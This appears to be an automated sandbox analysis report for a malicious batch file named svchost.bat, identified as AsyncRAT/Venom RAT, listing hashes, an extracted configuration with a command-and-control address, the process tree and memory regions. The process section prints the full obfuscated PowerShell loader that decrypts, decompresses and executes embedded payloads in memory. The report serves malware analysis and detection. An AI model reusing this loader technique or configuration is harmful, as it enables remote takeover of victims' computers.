Analysis

  • max time kernel
    283s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09-07-2024 21:36

General

  • Target

    svchost.bat

  • Size

    396KB

  • MD5

    8eeff7476b9e0d2c7b56538d7cc98e7a

  • SHA1

    84991e8c34d6e9cefb7b5d8b79202d5fc5935396

  • SHA256

    908fd49bd1d8751057fa509240b3dd3e161e9af3e1440d927d919c01eb949ad2

  • SHA512

    174311a059e3b2bd16029a80e4b0bf007d0b31a54395f8a036c53e2905aaf4656c30c51a9dff4880bbc2b6bb3e0a237ad35e126367a00b456f3e426f58ddc919

  • SSDEEP

    12288:71qhIV59Nm/Jzw5WwHdKkZGmgEI9oOC/zupA9csmX:7CIRNm/O5WwHdpZOEI9C6pAvW

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

147.185.221.20:49485

Mutex

RANDOM-SHIT

Attributes
  • delay

    3

  • install

    true

  • install_file

    svchost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3092
      • C:\Windows\system32\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
          PID:2688
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1460
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n9ZmU5/PC5KtVx1quQV0tSXT3NElOxxx6q5t6hjaxWA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5OqvQAvAr9GTRWmouqMfEQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qtKDW=New-Object System.IO.MemoryStream(,$param_var); $MgUrt=New-Object System.IO.MemoryStream; $FhzHj=New-Object System.IO.Compression.GZipStream($qtKDW, [IO.Compression.CompressionMode]::Decompress); $FhzHj.CopyTo($MgUrt); $FhzHj.Dispose(); $qtKDW.Dispose(); $MgUrt.Dispose(); $MgUrt.ToArray();}function execute_function($param_var,$param2_var){ $xZsKh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bIPsk=$xZsKh.EntryPoint; $bIPsk.Invoke($null, $param2_var);}$MDTVT = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $MDTVT;$yugZz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MDTVT).Split([Environment]::NewLine);foreach ($pgATY in $yugZz) { if ($pgATY.StartsWith('qAbBQpLuRAqBaeIZIbhf')) { $UxrsW=$pgATY.Substring(20); break; }}$payloads_var=[string[]]$UxrsW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
            3⤵
              PID:1252
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3684

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_324hdtyy.1go.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • memory/2688-67-0x000001FA0BAA0000-0x000001FA0BAAA000-memory.dmp

          Filesize

          40KB

        • memory/2688-82-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/2688-78-0x00007FF8A5680000-0x00007FF8A58C9000-memory.dmp

          Filesize

          2.3MB

        • memory/2688-75-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/2688-79-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/2688-77-0x00007FF8A5FD0000-0x00007FF8A607E000-memory.dmp

          Filesize

          696KB

        • memory/2688-74-0x000001FA0D610000-0x000001FA0DA10000-memory.dmp

          Filesize

          4.0MB

        • memory/2688-73-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/3368-63-0x0000000001320000-0x0000000001329000-memory.dmp

          Filesize

          36KB

        • memory/3368-64-0x0000000009BC0000-0x0000000009FC0000-memory.dmp

          Filesize

          4.0MB

        • memory/3368-66-0x0000000009BC0000-0x0000000009FC0000-memory.dmp

          Filesize

          4.0MB

        • memory/3368-69-0x00007FF8A8371000-0x00007FF8A847F000-memory.dmp

          Filesize

          1.1MB

        • memory/3368-60-0x0000000009BC0000-0x0000000009FC0000-memory.dmp

          Filesize

          4.0MB

        • memory/3368-96-0x0000000009BC0000-0x0000000009FC0000-memory.dmp

          Filesize

          4.0MB

        • memory/3368-65-0x0000000009BC0000-0x0000000009FC0000-memory.dmp

          Filesize

          4.0MB

        • memory/3368-95-0x0000000001320000-0x0000000001329000-memory.dmp

          Filesize

          36KB

        • memory/3368-58-0x0000000002D80000-0x0000000002DA9000-memory.dmp

          Filesize

          164KB

        • memory/3368-59-0x0000000001320000-0x0000000001329000-memory.dmp

          Filesize

          36KB

        • memory/3684-54-0x0000020DDA8C0000-0x0000020DDA8C8000-memory.dmp

          Filesize

          32KB

        • memory/3684-6-0x0000020DDA950000-0x0000020DDA972000-memory.dmp

          Filesize

          136KB

        • memory/3684-4-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/3684-33-0x0000020DDAAC0000-0x0000020DDAAFC000-memory.dmp

          Filesize

          240KB

        • memory/3684-44-0x0000020DDAEE0000-0x0000020DDAF56000-memory.dmp

          Filesize

          472KB

        • memory/3684-5-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/3684-83-0x0000020DDAF60000-0x0000020DDAF78000-memory.dmp

          Filesize

          96KB

        • memory/3684-93-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/3684-94-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/3684-53-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB

        • memory/3684-55-0x0000020DDAB40000-0x0000020DDAB8C000-memory.dmp

          Filesize

          304KB

        • memory/3684-97-0x00007FF8A8370000-0x00007FF8A854B000-memory.dmp

          Filesize

          1.9MB